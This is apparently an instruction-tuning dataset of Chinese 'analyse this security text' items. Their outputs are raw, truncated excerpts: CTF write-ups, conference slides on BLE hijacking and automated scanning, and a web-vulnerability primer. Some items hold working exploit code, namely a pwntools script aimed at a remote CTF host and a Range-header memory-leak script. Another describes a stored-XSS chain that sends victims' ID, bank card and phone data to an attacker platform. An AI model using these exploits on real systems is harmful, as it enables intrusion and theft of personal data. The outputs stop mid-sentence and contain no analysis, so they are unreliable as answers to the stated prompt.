{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# shark on wire 2 Forensics, 300 points ## Description: > We found this packet capture. Recover the flag that was pilfered from the network. ## Solution: This is the follow-up of [shark on wire 1](shark_on_wire_1.md). Again, we receive a capture file: ```console root@kali:/media/sf_CTFs/pico/shark_on_wire_2# tshark -r capture.pcap | head Running as user \"root\" and group \"root\". This could be dangerous. 1 0.000000 fe80::20c:29ff:fef7:6ad  ff02::fb MDNS 180 Standard query 0x0000 PTR _nfs._tcp.local, \"QM\" question PTR _ftp._tcp.local, \"QM\" question PTR _webdav._tcp.local, \"QM\" question PTR _webdavs._tcp.local, \"QM\" question PTR _sftp-ssh._tcp.local, \"QM\" question PTR _smb._tcp.local, \"QM\" question PTR _afpovertcp._tcp.local, \"QM\" question 5353 5353 2 0.000494 10.0.0.6  224.0.0.251 MDNS 160 Standard query 0x0000 PTR _nfs._tcp.local, \"QM\" question PTR _ftp._tcp.local, \"QM\" question PTR _webdav._tcp.local, \"QM\" question PTR _webdavs._tcp.local, \"QM\" question PTR _sftp-ssh._tcp.local, \"QM\" question PTR _smb._tcp.local, \"QM\" question PTR _afpovertcp._tcp.local, \"QM\" question 5353 5353 3 11.996569 fe80::5ca9:605:a9be:272d  ff02::fb MDNS 180 Standard query 0x0000 PTR _ftp._tcp.local, \"QM\" question PTR _nfs._tcp.local, \"QM\" question PTR _afpovertcp._tcp.local, \"QM\" question PTR _smb._tcp.local, \"QM\" question PTR _sftp-ssh._tcp.local, \"QM\" question PTR _webdavs._tcp.local, \"QM\" question PTR _webdav._tcp.local, \"QM\" question 5353 5353 4 11.996897 10.0.0.5  224.0.0.251 MDNS 160 Standard query 0x0000 PTR _ftp._tcp.local, \"QM\" question PTR _nfs._tcp.local, \"QM\" question PTR _afpovertcp._tcp.local, \"QM\" question PTR _smb._tcp.local, \"QM\" question PTR _sftp-ssh._tcp.local, \"QM\" question PTR _webdavs._tcp.local, \"QM\" question PTR _webdav._tcp.local, \"QM\" question 5353 5353 5 16.004668 fe80::20c:29ff:fef7:6ad  ff02::fb MDNS 180 Standard query 0x0000 PTR _nfs._tcp.local, \"QM\" question PTR _ftp._tcp.local, \"QM\" question PTR _webdav._tcp.local, \"QM\" question PTR _webdavs._tcp.local, \"QM\" ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Episode 3: Challenge 2 ## Description > You got in, but can you get out? Better run fast. socat FILE:`tty`,raw,echo=0 TCP:shell-sprinter.h4ck.ctfcompetition.com:1337 (Shift+Q to quit) > > Hint: If you ain't cheating, you ain't trying ## Solution Let's connect to the server: ```console ####################################################### \\ You wake up in an unfamiliar place. Or rather, it \\ \\ seems familiar but somehow... not. Like a place \\ \\ youve visited a thousand times but now rendered in \\ \\ a dream. Youre in a dark corridor, your small orb \\ \\ of light illuminates only the faded green linoleum \\ \\ that drops away into blackness. You check your \\ \\ pockets. Nothing. Youre alone. \\ \\ \\ \\ \\ \\ You begin to walk, only to encounter... a blank \\ \\ wall. The smooth, cream facade blocks your way \\ \\ abruptly. You follow it, skirting the wall closely \\ \\ and discover a fork in the corridor. Ok. This is a \\ \\ maze. As you pause to take stock you hear the \\ \\ knocking of even footsteps. Theyre growing closer. \\ \\ The sound is innocuous, but you feel a surge of \\ \\ panic. It starts in the back of your head and \\ \\ washes over you in a hot wave. Youre not sure how, \\ \\ but you know it is time to leave. On an instinctual \\ \\ level, you know. Its time to escape... \\ \\ \\ \\ \\ ####################################################### ``` It's actually a fairly fun ASCII-based game: ``` \\\\ @scape_986e080b ]=~~-############################### \\ \\ \\ \\ \\ \\ \\ \\ \\ \\ \\ \\ \\ \\ \\ -------------- \\ \\ |........|...| \\ \\ |@..|....|...| \\ \\ |...|........| \\ \\ |....@...|...| \\ Energy Level: Fine \\ ---------|...| \\ \\ |...---O |---=---- \\ )=[Inventory]=~-------- \\ |............ |.......| \\ 1. Datakey [trs80] \\ ----..--- ------.....x.| \\ 2. \\ |............|.......| \\ 3. \\ |....-----...O.......O \\ 4. \\ |............|.......| \\ 5. \\ -------------|.......| \\ 6. \\ |.......---------\\ 7. \\ |................\\ 8. ####################################################### ``` We can go on and on, but the i", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHCTF 2018 HCTF 2018 PWN the end babyprintf_ver2 easyexp christmas Reverse LuckyStar Seven PolishDuck Web kzone admin bottle | open | working: hide and seek Game | solved | working: Crypto xor game rsa?xor BlockChain Re:Ethereum from zero ez2win MISC freq game eazy dump Difficult programming language Guess My Key https://hctf.io/#/ 119 20:00 - 1111 20:00 PWN the end from pwn import * #context.aslr = False context.log_level = 'debug' def pwn(p): p.recvuntil('here is a gift ') libc_base = int(p.recvuntil(',', drop=True), 16) - 0x0CC230 babyprintf_ver2 stdout_vtable = libc_base + 0x3c56f8 fake_io_jump = 0x3c3fb0 + libc_base remote_addr = libc_base + 0x3c4008 one_gadget = libc_base + 0x4526a one_gadget = libc_base + 0xF02B0 log.success('libc: {}'.format(hex(libc_base))) log.success('stdout_vtable: {}'.format(hex(stdout_vtable))) log.success('fake_io_jump: {}'.format(hex(fake_io_jump))) log.success('remote_addr: {}'.format(hex(remote_addr))) log.success('one_gadget: {}'.format(hex(one_gadget))) #0x3c5c58 payload = p64(stdout_vtable) payload += p64(fake_io_jump)[0] payload += p64(stdout_vtable + 1) payload += p64(fake_io_jump)[1] payload += p64(remote_addr) payload += p64(one_gadget)[0] payload += p64(remote_addr + 1) payload += p64(one_gadget)[1] payload += p64(remote_addr + 2) payload += p64(one_gadget)[2] #gdb.attach(p) p.send(payload) p.interactive() if __name__ == '__main__': p = remote('150.109.44.250', 20002) p.recvuntil('Input your token:') p.sendline('RVZhvB2OtdydtHAaHxdEeRcFzZlKIC9U') #p = process('./the_end') #p.interactive() pwn(p) from pwn import * context.log_level = 'debug' context.aslr = False def pwn(p): p.recvuntil('So I change the buffer location to ') program_base = int(p.recvuntil('\\n', drop=True), 16) - 0x202010 log.success('program_base: {}'.format(hex(program_base))) p.sendline('%a') p.recvuntil('0x0.0') libc_base = int(p.recvuntil('p', drop=True), 16) - 0x50e8 log.success('libc_base: {}'.format(hex(libc_base))) p.sendline('%100000cb') p.recvuntil('b'", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nYOU'D BETTER SECURE YOUR YOU'D BETTER SECURE YOUR BLE DEVICES OR WE'LL KICK BLE DEVICES OR WE'LL KICK YOUR BUTTS ! YOUR BUTTS ! @virtualabs | DEFCON 26 WHO AM I ? WHO AM I ? Head of R&D @ Econocom Digital Security Studying Bluetooth Low Energy for 3 years Developer & maintainer of BtleJuice Having fun with Nordic's nRF51822  AGENDA AGENDA BLE sniffing 101 Improving the BLE arsenal Sniffing BLE connections in 2018 Introducing BtleJack, a flexible sniffing tool BtleJacking: a brand new attack How it works Vulnerable devices & demos Recommendations BLE SNIFFING 101 BLE SNIFFING 101 MUCH CHEAP TOOLS, MUCH CHEAP TOOLS, (NOT) WOW RESULTS (NOT) WOW RESULTS Sniffing existing/new connections with an Ubertooth One Sniffing new connections with an Adafruit's Bluefruit LE Sniffer Sniffing BLE packets with gnuradio Sniffs existing and new connections Does not support channel map updates Costs $120 UBERTOOTH ONE UBERTOOTH ONE Up-to-date soware (Nov. 2017) Proprietary firmware from Nordic Semiconductor Sniffs only new connections Costs $30 - $40 BLUEFRUIT LE SNIFFER BLUEFRUIT LE SNIFFER Sniffs only BLE advertisements Unable to follow any existing/new connection Latency Requires 2.4GHz compatible SDR device SOFTWARE DEFINED RADIO SOFTWARE DEFINED RADIO BLE SNIFFING 101 BLE SNIFFING 101 BLE is designed to make sniffing difficult: 3 separate advertising channels Uses Frequency Hopping Spread Spectrum (FHSS) Master or slave can renegotiate some parameters at any time Sniffing BLE connections is either hard or expensive MAN IN THE MIDDLE MAN IN THE MIDDLE HOW BLE MITM WORKS HOW BLE MITM WORKS Discover the target device (advertisement data, services & characteristics) Connect to this target device, it is not advertising anymore (connected state) Advertise the same device, await connections and forward data BTLEJUICE BTLEJUICE https://github.com/DigitalSecurity/btlejuice GATTACKER GATTACKER https://github.com/securing/gattacker Pros: Get rid of the 3 advertising channels issue You see every BLE opera", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nsync === 用于强制被改变的内容立刻写入磁盘 ## 补充说明 **sync命令** 用于强制被改变的内容立刻写入磁盘更新超块信息 在Linux/Unix系统中在文件或数据处理过程中一般先放到内存缓冲区中等到适当的时候再写入磁盘以提高系统的运行效率sync命令则可用来强制将内存缓冲区中的数据立即写入磁盘中用户通常不需执行sync命令系统会自动执行update或bdflush操作将缓冲区的数据写 入磁盘只有在update或bdflush无法执行或用户需要非正常关机时才需手动执行sync命令 ### 语法 ```shell sync(选项) ``` ### 选项 ```shell -d, --data 只同步文件数据不同步不必要的元数据 -f, --file-system 同步包含这些文件的文件系统 --help显示帮助 --version显示版本信息 ``` ### buffer与cache * buffer为了解决写磁盘的效率 * cache为了解决读磁盘的效率 linux系统为了提高读写磁盘的效率会先将数据放在一块buffer中在写磁盘时并不是立即将数据写到磁盘中而是先写入这块buffer中了此时如果重启系统就可能造成数据丢失 sync命令用来flush文件系统buffer这样数据才会真正的写到磁盘中并且buffer才能够释放出来flush就是用来清空buffersync命令会强制将数据写入磁盘中并释放该数据对应的buffer所以常常会在写磁盘后输入sync命令来将数据真正的写入磁盘 如果不去手动的输入sync命令来真正的去写磁盘linux系统也会周期性的去sync数据", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Preflag Pwn, 10 points ## Description > LFI is Local flag inclusion ## Solution We enter the attached website and are presented with a short form: ```html <html> <head> <title>Preflag</title> </head> <body> <form action=\"gcc\" method=\"POST\" enctype=\"multipart/form-data\"> <input type=\"file\" name=\"inputFile\"/> <button type=\"submit\">Send</button> </form> </body> </html> ``` Uploading different formats, we are receive an error message from the server. However, the form name (`gcc`) hints that we should be uploading a `C` file. Let's try it out: ```c #include <stdio.h> int main() { printf(\"Hello, World!\"); return 0; } ``` As a result, we receive a file from the server: ```console root@kali:/media/sf_CTFs/kaf/Preflag# file compiled compiled: ELF 64-bit LSB pie executable x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=25c27c0449db49918b6a5d6655018af834a8e80f, not stripped root@kali:/media/sf_CTFs/kaf/Preflag# strings compiled | grep Hello Hello, World! ``` The server has compiled the source file and provided us with the result. This means that we can `#include` local files and hope to see the result in the compiled binary. Let's try different file names using the new [__has_include](https://gcc.gnu.org/onlinedocs/cpp/_005f_005fhas_005finclude.html) preprocessor operator. This way, we can supply multiple file names in the same attempt without failing compilation if any of them are missing: ```c char* marker = \"##MARKER##\"; char* file = __FILE__; #if __has_include(\"flag.txt\") char* __flag_txt = \"__flag.txt__\"; #include \"flag.txt\" #endif #if __has_include(\"flag\") char* __flag = \"__flag__\"; #include \"flag\" #endif #if __has_include(\"/flag.txt\") char* __flag_txt2 = \"__/flag.txt__\"; #include \"/flag.txt\" #endif #if __has_include(\"/flag\") char* __flag2 = \"__/flag__\"; #include \"/flag\" #endif #if __has_include(\"flag.h\") char* __flag_h = \"__/flag.h__\"; #include \"flag.h\" #endif #if __has_include(\"flag.c\") char*", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x01 前奏 前不久在挖掘某SRC时提交漏洞时偶然在该SRC官的编辑器发现了个接 起初以为是任意件包含能RCE了后来测试发现只是拼接读取了远程资源站的图原本都想着放弃了但是当 我在后缀添加了个+号后图被意外的解析成了HTML这不就意味着get到个存储型XSS https://xxx.cn/xxxx/ueditor?image_name=/xxx.png+ 接着测试发现拼接图在个级录下尝试穿越发现存在研WAF于是Fuzz了下Payload成功Bypass #####WAF #####Bypass Payload: 0x02 漏洞利 1. 利010Editor或copy命令制作含有恶意代码的图 copy tiny.png /b + code.txt /a tiny_code.png 2. 通过本站的件上传恶意图取得件名之所以png格式是因为jpg会校验是否为正常图 3. 由于该SRC官财务打款需要机个信息(姓名机号sfz等)这些信息户是可的 我们直接编写了个demo.js于读取受害者个信息将其部署在XSS平台 /..%252F/ 脚本会通过Ajax请求URL使DOMParser转换并解析DOM对象提取户身份证银卡机号地址 等信息后合并base64发送到XSS平台找了团队的个朋友测试OK 4. 构造跳转站诱导受害者访问 这时只要受害者访问该服务跳转恶意就能获取信息 成功窃取到受害者的信息base64解码即可 0x03 技术点总结 1. Fuzz出接及参数,拼接+号解析成HTML 2. URL拼接时BypassWAF进录穿越 3. 使DOMParser转换为DOM对象并提取表单input值后通过window.btoa函数base64编码字符串", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDefending Networks with Incomplete Information: A Machine Learning Approach Alexandre Pinto alexcp@mlsecproject.org @alexcpsec @MLSecProject  This is a talk about DEFENDING not attacking  NO systems were harmed on the development of this talk.  We are actually trying to BUILD something here.  This talk includes more MATH than the daily recommended intake by the FDA.  You have been warned... ** WARNING **  12 years in Information Security, done a little bit of everything.  Past 7 or so years leading security consultancy and monitoring teams in Brazil, London and the US.  If there is any way a SIEM can hurt you, it did to me.  Researching machine learning and data science in general for the past year or so. Participates in Kaggle machine learning competitions (for fun, not for profit).  First presentation at DefCon! (where is my shot?) Whos this guy?  Security Monitoring: We are doing it wrong  Machine Learning and the Robot Uprising  Data gathering for InfoSec  Case study: Model to detect malicious activity from log data  MLSec Project  Attacks and Adversaries  Future Direction Agenda  Logs, logs everywhere The Monitoring Problem  Logs, logs everywhere The Monitoring Problem  SANS Eighth Annual 2012 Log and Event Management Survey Results (http:// www.sans.org/reading_room/analysts_program/SortingThruNoise.pdf) Are these the right tools for the job?  SANS Eighth Annual 2012 Log and Event Management Survey Results (http:// www.sans.org/reading_room/analysts_program/SortingThruNoise.pdf) Are these the right tools for the job?  Rules in a SIEM solution invariably are:  Something has happened x times;  Something has happened and other something2 has happened, with some relationship (time, same fields, etc) between them.  Configuring SIEM = iterate on combinations until:  Customer or management is fooled satisfied; or  Consulting money runs out  Behavioral rules (anomaly detection) helps a bit with the xs, but still, very laborious and time consuming. Correlation Rules: a Pri", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nI Fight For The Users Episode I Attacks Against Top Consumer Products Who are we? @zfasel @SecBarbie Our Credentials? (null) Before we get started Con Speaker Rule 101 If youre naming vendors and dont want your talk pulled, even if its already known and even if the impact is low, dont disclose too much ahead of time. TL;dr  Bluetooth -> All the things!  Wireless Security Products -> CCTV LOLZ  Consumer Windows Install -> Whoops  Q&A after talk 3 Topics in One Talk?  Keep it close to 20 minutes  So 15+15+15 = 45! MATH!  Also squirel. Bluetooth all the things! Another Bluetooth Talk?  BlueHydra* - Zero_Chaos & Granolocks  BLE Locks From Miles Away  Rose & Ramsey  BLE GATT Proxy Tool  Jasek  BLE-REPLAY & BLESUITE - Foringer & Trabun So whats different here? Rules  Never reveal the secret  Never repeat a trick for the same audience  Practice. Over and Over. Rules  Never reveal the secret  Never repeat a trick for the same audience  Practice. Over and Over. How do you wirelessly ID someone?  Car on the way in?  ALPR  ETC RFID  Bluetooth  Came in by foot?  Facial Recognition  Voice Recognition  Cell Phone?  WiFi  Bluetooth  IMSI Catcher  Proximity  Credit Card RFID  Car Keys RFID  Work badges  The not fancy ways  Reservation Names  RFID Loyalty cards  Credit cards  Social engineering How do you wirelessly ID someone?  Car on the way in?  ALPR  ETC RFID  Bluetooth  Came in by foot?  Facial Recognition  Voice Recognition  Cell Phone?  WiFi  Bluetooth  IMSI Catcher  Proximity  Credit Card RFID  Car Keys RFID  Work badges  The not fancy ways  Reservation Names  RFID Loyalty card  Credit cards  Social engineering Say it isn't so! Wifi caught on to this  iOS8 and Android 6.0  Historical SSIDs identify real mac  Take it as a data point, but not trust it That leaves us with  Came in by foot?  Cell Phone?  Bluetooth  Proximity  Car Keys RFID  The not fancy ways  RFID Loyalty card That leaves us with  Came in by foot?  Cell Phone?  Bluetooth  Proximity  Car Keys RFID  The not fancy", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n自动化攻击背景下的过去现在与未来 @ringzero 2 关于我  网名猪猪侠  8年信息安全从业经历  信息安全领域爱好者  安全测试  数据挖掘  微博@ringzero 我的安全观互联网的本质 3 互联网的本质就两个字信息 信息只做一个用处就是交换 我的安全观互联网下信息安全的本质 4 互联网 连接彼此交换信息 信息安全 保护信息在交换(传递)过程 中的完整性可用性保密 性 我的安全观连接彼此 交换信息 与目标系统进行信息交换 可以发起交换的请求 耦合度高被攻击可能性越大 涟漪效应 信息传递的客体对象社会信息背 后的属性都和人有关 人们的愚蠢没有补丁可打 八大典型APT越来越趋向针对个人 最容易成功 6 APT RSA SecurID 被窃 夜龙攻击 Stuxnet 震网 Google 极光攻击 Luckycat 攻击 Nitro攻击 Lurid 攻击 暗鼠攻击 诱骗员工点击 恶意链接附件 Web服务器 被作为跳板 定向钓鱼 恶意邮件 定向钓鱼 恶意邮件 定向钓鱼 恶意邮件 定向钓鱼 恶意邮件 定向钓鱼 恶意邮件 军火级别 政治武器 DUQU FLAME  利用已知漏洞寻找目标  重度依赖搜索引擎  工具交互模式固定不可扩展(多以Windows为主)  流程化的利用模式 过去发起的攻击方式 7 回顾过去的攻击方式三字经 8 进谷歌 找记录 没记录 就旁注 没旁注 猜目录 没目录 就嗅探 找后台 穷枚举 传小马 放大马 偷密码 挂页面 提权限 扫内网  模块化高可扩展(脚本Python)  系统服务组件指纹标准化入库  高覆盖率分布式全球节点  重新定义网络边界(Socks5代理隧道) 现在 (脚本套脚本一键完成) 9 1深度扫描流程 11 WOOYUN 扫描目标 添加 自动分析 分解目标 深度信息 采集 指纹识别 入库 漏洞脚本库 队列执行 漏洞验证 返回结果 2添加扫描任务 12 WOOYUN 2添加扫描任务 (指定域名) 13 WOOYUN ① DNS 域传送漏洞 ② DNS 二级域名穷举 ③ GOOGLE 搜索域名 ① 域名IP C段加入队列 ② MX记录C段加入队列 ③ 爱站反查已添加的IP 开始扫描任务 3信息收集IP 信息 14 WOOYUN 3信息收集服务端口指纹信息 15 WOOYUN 爬取首页记录HTTP头 3信息收集域名信息 通过爱站BING反查域名 入库 16 WEB指纹识别 4WEB指纹识别条件库 17 4WEB指纹识别 返回网页内容中是否包含特定 HTTP头 18 4WEB指纹识别 文件MD5对比 存在特定文件? 19 5WEB漏洞库管理模块 20 6WEB漏洞测试方法 正则匹配特定变量 21 7脚本管理 定义好传入参数 URL & IP:端口 22 7深度扫描为漏洞扫描脚本 分配目标 填充参数 23 7深度扫描脚本依据SQL条件分配扫描参数 24 8指纹识别入库扫描结果入库 25 WOOYUN 添加目标 自动分解 自动采集 自动入库 队列下发 等待结果 未来可强化的地方 26 信息收集效率(更丰富的收集规则) 资源整合能力第三方数据整合 覆盖率 误报率 漏洞规则库更多的漏洞模块化 信息收集效率 (1467项 Google Hacking Database) 27 GHDB Files containing juicy info ( 225 ) Web Server Detection ( 75 ) Error Messages ( 67 ) Files containing usernames ( 14 ) Files containing passwords ( 138 ) Sensitive Directories ( 60 ) Vulnerable Servers ( 48 ) Footholds ( 21 ) Advisories and Vulnerabilities ( 223 ) Miscellaneous ( 12 ) Pages containing network or vulnerability data ( 60 ) Pages containing login portals ( 233 ) Various Online Devices ( 195 ) Sensitive Online Shopping Info ( 9 ) Vulnerable Files ( 56 ) Technology profile ( 32 ) 漏洞规则库330个通用漏洞利用脚本 28 Apache Geronimo Default Administrative Credentials.script Pending Apache httpOnly Cookie Disclosure.scr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#!/usr/bin/env python import sys import requests if len(sys.argv) < 2: print(\"%s url\" % (sys.argv[0])) print(\"eg: python %s http://your-ip:8080/\" % (sys.argv[0])) sys.exit() headers = { 'User-Agent': \"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240\" } offset = 605 url = sys.argv[1] file_len = len(requests.get(url, headers=headers).content) n = file_len + offset headers['Range'] = \"bytes=-%d,-%d\" % ( n, 0x8000000000000000 - n) r = requests.get(url, headers=headers) print(r.text)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIPv6 Primer Gene Cronk  CISSP, NSA-IAM SME  North American IPv6 Task Force Systems Admin  The Robin Shepherd Group gene@hacksonville.org Why IPv6? Quick History  1992  Internet Engineering Task Force (IETF)  Global shortage of IPv4 addresses  Technical limitations of IPv4  1993  RFC1550 created  1995  Next generation internet protocol (IPv6) chosen as IPng (IP Next Generation) Why IPv6? Comparison with IPv4  IPv4  32 bit address space (4.3 billion possible addresses)  IPv6  128 bit address space (3.4 * 1038 or 340 undecillion addresses)  64 billion IPs for every square centimeter on earth Why IPv6? Comparison with IPv4  IPv4  20 some odd years ago  Many band-aids applied to address needs  IPv6  Integrates many network improvements made over that time Why IPv6? Comparison with IPv4  Stateless autoconfiguration  IPv4  DHCP server is possible, but not mandatory.  IPv6  Automagic Link Local address as soon as you boot the machine (see RFC 2462)  Mechanism is similar to getting a 169.xxx.xxx.xxx address on boot in IPv4 Why IPv6? Comparison with IPv4  Security & QoS  IPv4 IPSec and QoS are add-ons  IPv6 Encryption, IPSec and QoS built in Why IPv6? Comparison with IPv4  A cure for routing table growth  IPv4  Backbone routing table size has become a monsterous headache to ISPs and backbone operators. (113,000 as of 2003)  IPv6  Maximum amount of routes a router will see in the default-free zone is 8192. Why IPv6? Comparison with IPv4  From www.mcvax.org/~jhma/routing/bgp-hist.html : Why IPv6? Comparison with IPv4  Roaming becomes much easier  Use of Mobile IPv6 and AnyCast  Cell phone roaming much cleaner  Cell phone can automatically identify new routing information from a new tower  Cell phone keeps the same IP Why IPv6? Comparison with IPv4  IPv6 reestablishes end to end connectivity  The internet was originally designed for hosts to communicate directly with each other  One of the fixes to keep IPv4 working (NAT) breaks end to end connectivity What do I need to know abo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPSRC小目标挣他一个亿 讲师carry_your 138,270,000 CONTENTS 01 资产收集技巧 02 漏洞挖掘案例 03 职业规划梳理 资产收集 1 在渗透测试中我们需要尽可能多 的去收集目标的信息资产探测和 信息收集决定了你发现安全漏洞 的几率有多大如何最大化的去收 集目标范围尽可能的收集到子域 名及相关域名的信息这对我们进 一步的渗透测试显得尤为重要 基本概况 IP段+端 口 域名 APP 服务号 API 信息泄露 社工 基本概况 股权结构查询 大型金融集团往往有着非常复 杂的股权结构通过工商查询 目标集团的股权结构更全面 的了解目标集团的公司资产 从一个点切入可获取到集团所 有的子公司信息以及关联业务 尽可能多的发现相关资产 持续监控资产 大型金融集团往往会有频繁的新 业务上线和老业务变更而新上 线或者进行变更的资产往往更 容易存在漏洞通过对这些的监 控可以在第一时间去检测这些系 统往往可以更高效的挖掘到高 风险安全漏洞 信息泄露监控 大型金融集团往往有着数量庞 大的员工数或者外包人员而 少数员工和外包人员缺乏安全 意识经常会无意识的做一些 信息泄露的事情比如公司信 息上传网盘代码信息上传 github等 基本资产监控 大型金融集团往往有着复杂而 且持续变化的网络和主机资产 这些主机上面往往开着各种的 服务和应用而且往往一些比 较奇葩的端口上运行着安全防 护较为薄弱的应用或者服务 这些就是我们需要关注的地方 Part 1 从股权结构切入 Part 2 新上线资产监控 Part 3 泄露信息收集 Part 4 C段+端口定时跑批 从股权结构切入 持续监控资产 APP持续监控 持续监控资产 持续监控资产 微信公众号持续监控 信息泄露监控 信息泄露监控 信息泄露监控 基本资产监控 漏洞挖掘 漏洞挖掘有时候不单单是简单的漏 洞利用往往漏洞挖掘的过程中会 有各种复杂的网络环境以及攻防切 磋在特定的环境下发现漏洞并 举一反三共同提高企业安全水平 2才是我们的目标 逻辑漏 洞 系统漏 洞 人为漏 洞 常规漏 洞 金融行业常见漏洞类型 金融行业常见漏洞类型 案例1-参数加密的密码重置 案例1 案例1 id_user=df4391c2-763f-49fc-978e-f7aab56e215d 案例1 {\"Message\":[\"短信已发 送!\"],\"Level\":0,\"Data\":{\"id\":\"d9052d34-d8b7- 4ba9-8e5c- 6106986c8399\",\"flag_lx\":1,\"username\":\"135XX XX5171\",\"id_masteruser\":\"0\",\"id_user\":\"c60ce6 54-c873-485a-971c- 65e3daeff8da\",\"id_edit\":\"c60ce654-c873- 485a-971c- 65e3daeff8da\",\"rq_edit\":\"\\/Date(1546941421 823)\\/\"},\"Success\":true} id_user\":\"c60ce654-c873-485a-971c-65e3daeff8da username\":\"135XXXX5171\" 案例1 案例2-另类的越权漏洞 参数clinicId存在越权值为f4e350c7-78ff-4dbc-806d-2fc99254d646 POST /xxxxxx/app.do HTTP/1.1 Host: gw.xxxxxx.com Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cookie: BIGipServer_nginx_pool=926027948.36895.0000 Connection: close Accept: */* User-Agent: XXXX2B/1.8.1 (iPhone; iOS 10.3.1; Scale/2.00) Accept-Language: zh-Hans-CN;q=1 Content-Length: 318 X-Request-Id: 9F613F2C-29D0-44F3-95BB-011FAA7577B8 a p p S r c = 3 & a p p T y p e = B & a p p _ c o d e = 2 3 0 0 4 & c a s U u i d = 1 & c l i n i c I d = f 4 e 3 5 0 c 7 - 7 8 f f - 4 d b c - 8 0 6 d - 2 f c 9 9 2 5 4 d 6 4 6 & c u r r e n t C a s U u i d = 0 a 8 0 9", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Web Generic --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- ## 大纲 * **[文件包含](#文件包含)** * [日志中毒攻击](#日志中毒攻击) * **[文件解析](#文件解析)** * [IIS](#iis) * [Nginx](#nginx) * [Apache](#apache) * [其他](#其他) * **[文件上传](#文件上传)** * **[信息泄露](#信息泄露)** * [目录遍历](#目录遍历) * [Fileread](#fileread) * [源码泄露](#源码泄露) * [GIT](#git) * [SVN](#svn) * [bzr](#bzr) * [DS_Store文件泄漏](#ds_store文件泄漏) * [SWP文件泄露](#swp文件泄露) * [网站备份压缩文件](#网站备份压缩文件) * [WEB-INF/web.xml信息泄露](#web-infwebxml信息泄露) * [idea文件夹泄露](#idea文件夹泄露) * [JS敏感信息泄露](#js敏感信息泄露) * [Swagger_REST_API信息泄露](#Swagger_REST_API信息泄露) * [各类APIkey泄露](#各类apikey泄露) * [SOAP泄露](#SOAP泄露) * **[不安全的输入](#不安全的输入)** * [http参数污染](#http参数污染) * [CRLF_Injection](#crlf_injection) * [host_Injection](#host_Injection) * [SQL_inje](#sql_inje) * [XSS](#xss) * [XXE](#xxe) * [SSRF](#ssrf) * [SSTI](#ssti) * **[配置不当](#配置不当)** * [代理配置不当](#代理配置不当) * [CORS](#cors) * [CSRF](#csrf) * [jsonp劫持](#jsonp劫持) * **[钓鱼欺骗](#钓鱼欺骗)** * [URL跳转漏洞](#url跳转漏洞) * [二维码劫持](#二维码劫持) * [点击劫持](#点击劫持) --- **相关文章** - [聊聊安全测试中如何快速搞定 Webshell](https://www.freebuf.com/articles/web/201421.html) - [Web Service 渗透测试从入门到精通](https://www.anquanke.com/post/id/85910) - [我的Web应用安全模糊测试之路](https://web.archive.org/web/20180814113607/https://gh0st.cn/archives/2018-07-25/1) - [聊聊近期公开的几个GitLab高额奖金漏洞](https://mp.weixin.qq.com/s/m8AZuqXgGGitcwsP4l-sVQ) --- ## 文件包含 文件包含是一个功能在各种开发语言中都提供了内置的文件包含函数其可以使开发人员在一个代码文件中直接包含引入另外一个代码文件 比如 在 PHP 中提供了`include()`,`include_once()`,`require()`,`require_once()` 这些文件包含函数这些函数在代码设计中被经常使用到 大多数情况下文件包含函数中包含的代码文件是固定的因此也不会出现安全问题 但是有些时候文件包含的代码文件被写成了一个变量且这个变量可以由前端用户传进来这种情况下如果没有做足够的安全考虑则可能会引发文件包含漏洞 攻击着会指定一个意想不到的文件让包含函数去执行从而造成恶意操作 根据不同的配置环境文件包含漏洞分为如下两种情况 1. 本地文件包含漏洞仅能够对服务器本地的文件进行包含由于服务器上的文件并不是攻击者所能够控制的因此该情况下攻击着更多的会包含一些固定的系统配置文件从而读取系统敏感信息很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞从而形成更大的威力 2. 远程文件包含漏洞能够通过 url 地址对远程的文件进行包含这意味着攻击者可以传入任意的代码这种情况没啥好说的准备挂彩 因此在 web 应用系统的功能设计上尽量不要让前端用户直接传变量给包含函数如果非要这么做也一定要做严格的白名单策略进行过滤 **相关文章** - [LFIRFIPHP 封装协议安全问题学习 - 骑着蜗牛逛世界](https://www.cnblogs.com/LittleHann/p/3665062.html#383", "category": "text_analysis", "source": "security_papers"}
